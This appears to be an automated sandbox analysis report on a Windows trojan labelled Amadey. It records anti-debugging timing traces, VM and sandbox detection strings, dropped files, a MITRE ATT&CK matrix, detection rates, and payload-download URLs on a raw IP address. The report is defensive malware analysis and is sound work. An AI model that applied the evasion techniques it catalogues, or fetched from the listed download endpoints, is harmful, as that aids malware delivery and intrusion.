Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D70258 second address: 4D70277 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 mov edx, eax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D70277 second address: 4D7027D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D7027D second address: 4D70281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D701C5 second address: 4D701C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D701C9 second address: 4D701CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D701CF second address: 4D10DEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp dword ptr [7721155Ch] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 mov ecx, dword ptr fs:[00000018h] 0x0000001b mov eax, dword ptr [ebp+08h] 0x0000001e mov dword ptr [ecx+34h], 00000000h 0x00000025 cmp eax, 40h 0x00000028 jnc 00007F77004F22BDh 0x0000002a mov eax, dword ptr [ecx+eax*4+00000E10h] 0x00000031 pop ebp 0x00000032 retn 0004h 0x00000035 test eax, eax 0x00000037 je 00007F77004F22D3h 0x00000039 mov eax, dword ptr [00432010h] 0x0000003e cmp eax, FFFFFFFFh 0x00000041 je 00007F77004F22C9h 0x00000043 mov esi, 0042F218h 0x00000048 push esi 0x00000049 call 00007F7704E0170Eh 0x0000004e mov edi, edi 0x00000050 pushad 0x00000051 mov eax, 23C536DDh 0x00000056 mov ah, 63h 0x00000058 popad 0x00000059 push esi 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d pushfd 0x0000005e jmp 00007F77004F22C7h 0x00000063 sbb cx, 76FEh 0x00000068 jmp 00007F77004F22C9h 0x0000006d popfd 0x0000006e push ecx 0x0000006f pop edx 0x00000070 popad 0x00000071 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D109C8 second address: 4D109DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77012B90F2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D109DE second address: 4D10A08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F77004F22C8h 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D10A08 second address: 4D10A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D10A0E second address: 4D10A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D10A12 second address: 4D10A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D10A16 second address: 4D10A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub eax, eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c call 00007F77004F22BEh 0x00000011 pop esi 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D10A36 second address: 4D10A7A instructions: 0x00000000 rdtsc 0x00000002 mov ax, 6729h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 inc eax 0x0000000a jmp 00007F77012B90F4h 0x0000000f lock xadd dword ptr [ecx], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushfd 0x00000017 jmp 00007F77012B90ECh 0x0000001c and esi, 0792B428h 0x00000022 jmp 00007F77012B90EBh 0x00000027 popfd 0x00000028 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D7032E second address: 4D70338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 56460915h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D70338 second address: 4D70364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 call 00007F77012B90EDh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F77012B90F3h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D70F00 second address: 4D70F1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 1E74h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F77004F22BBh 0x00000013 pop eax 0x00000014 mov ax, di 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D70F1E second address: 4D70F24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D70F24 second address: 4D70F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D70F28 second address: 4D70F4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F77012B90F5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D70F4A second address: 4D70F50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D70F50 second address: 4D70F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSpecial instruction interceptor: First address: 81C96F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSpecial instruction interceptor: First address: 81C9AA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSpecial instruction interceptor: First address: 9BB52D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSpecial instruction interceptor: First address: A3DB4F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009AE68D rdtsc 4_2_009AE68D
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ws4FYw8333G101YedezSee\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ws4FYw8333G101YedezSee\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\tXEKP1ThBP.exe TID: 2684Thread sleep time: -54027s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exe TID: 7028Thread sleep count: 31 > 30Jump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exe TID: 7028Thread sleep time: -62031s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exe TID: 5812Thread sleep count: 36 > 30Jump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exe TID: 5812Thread sleep time: -72036s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exe TID: 7112Thread sleep count: 35 > 30Jump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exe TID: 7112Thread sleep time: -70035s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exe TID: 1264Thread sleep time: -36000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exe TID: 6140Thread sleep count: 34 > 30Jump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exe TID: 6140Thread sleep time: -68034s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exe TID: 7076Thread sleep count: 37 > 30Jump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exe TID: 7076Thread sleep time: -74037s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00415D07 FindFirstFileExW,4_2_00415D07
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_10007EA9 FindFirstFileExW,4_2_10007EA9
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B25F6E FindFirstFileExW,4_2_04B25F6E
Source: tXEKP1ThBP.exe, tXEKP1ThBP.exe, 00000004.00000002.2239849649.0000000000995000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.12.drBinary or memory string: VMware
Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: tXEKP1ThBP.exe, 00000004.00000002.2240611811.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000002.2243725772.0000000005574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.drBinary or memory string: vmci.sys
Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.drBinary or memory string: VMware20,1
Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: tXEKP1ThBP.exe, 00000004.00000002.2239849649.0000000000995000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile opened: NTICE
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile opened: SICE
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009AE68D rdtsc 4_2_009AE68D
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0040C0B3
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,4_2_00402950
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CD2A6F mov eax, dword ptr fs:[00000030h]4_3_04CD2A6F
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CCE30D mov eax, dword ptr fs:[00000030h]4_3_04CCE30D
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0041366F mov eax, dword ptr fs:[00000030h]4_2_0041366F
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0040EF0D mov eax, dword ptr fs:[00000030h]4_2_0040EF0D
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_10007A76 mov eax, dword ptr fs:[00000030h]4_2_10007A76
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_10005F25 mov eax, dword ptr fs:[00000030h]4_2_10005F25
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00CFADA3 push dword ptr fs:[00000030h]4_2_00CFADA3
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B10D90 mov eax, dword ptr fs:[00000030h]4_2_04B10D90
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B238D6 mov eax, dword ptr fs:[00000030h]4_2_04B238D6
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B1092B mov eax, dword ptr fs:[00000030h]4_2_04B1092B
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B1F174 mov eax, dword ptr fs:[00000030h]4_2_04B1F174
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00402C70 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,4_2_00402C70
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0040C0B3
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00409949 SetUnhandledExceptionFilter,4_2_00409949
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00408ED5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00408ED5
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_004097B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004097B2
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_10002ADF
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_100056A0
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_10002FDA
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B1913C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_04B1913C
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B19A19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_04B19A19
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B19BB0 SetUnhandledExceptionFilter,4_2_04B19BB0
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B1C31A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_04B1C31A
Source: tXEKP1ThBP.exe, tXEKP1ThBP.exe, 00000004.00000002.2239849649.0000000000995000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CC8DB3 cpuid 4_3_04CC8DB3
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00409BE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00409BE5
Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Command and Scripting Interpreter		1
DLL Side-Loading		2
Process Injection		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		24
Virtualization/Sandbox Evasion		LSASS Memory781
Security Software Discovery		Remote Desktop ProtocolData from Removable Media12
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Process Injection		Security Account Manager24
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS3
Process Discovery		Distributed Component Object ModelInput Capture11
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information		LSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
Software Packing		Cached Domain Credentials223
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
tXEKP1ThBP.exe73%VirustotalBrowse
tXEKP1ThBP.exe58%ReversingLabsWin32.Trojan.Amadey
tXEKP1ThBP.exe100%AviraHEUR/AGEN.1320706
tXEKP1ThBP.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ws4FYw8333G101YedezSee\Y-Cleaner.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]0%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\ws4FYw8333G101YedezSee\Bunifu_UI_v1.5.3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\ws4FYw8333G101YedezSee\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.156.73.23/add?substr=mixtwo&s=three&sub=empfalse
    		unknown
    http://185.156.73.23/dll/downloadfalse
      		unknown
      http://185.156.73.23/files/downloadfalse
        		unknown
        http://185.156.73.23/dll/keyfalse
          		unknown
          http://185.156.73.23/soft/downloadfalse
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://185.156.73.23/files/downloadktXEKP1ThBP.exe, 00000004.00000002.2240611811.0000000000D98000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://185.156.73.23/dll/keyetXEKP1ThBP.exe, 00000004.00000002.2243725772.0000000005560000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://g-cleanit.hktXEKP1ThBP.exe, 00000004.00000003.1833803865.000000000591E000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1832699006.000000000591E000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1834947373.000000000581D000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1835090251.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].4.dr, Y-Cleaner.exe.4.drfalse
                  		high
                  http://185.156.73.23/dll/downloadatXEKP1ThBP.exe, 00000004.00000002.2240611811.0000000000D98000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://upx.sf.netAmcache.hve.12.drfalse
                      		high
                      http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174tXEKP1ThBP.exe, 00000004.00000003.1833803865.000000000591E000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1832699006.000000000591E000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1834947373.000000000581D000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1835090251.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].4.dr, Y-Cleaner.exe.4.drfalse
                        		high
                        http://185.156.73.23/dll/downloadItXEKP1ThBP.exe, 00000004.00000002.2240611811.0000000000D98000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.156.73.23/files/download%tXEKP1ThBP.exe, 00000004.00000002.2240611811.0000000000D98000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
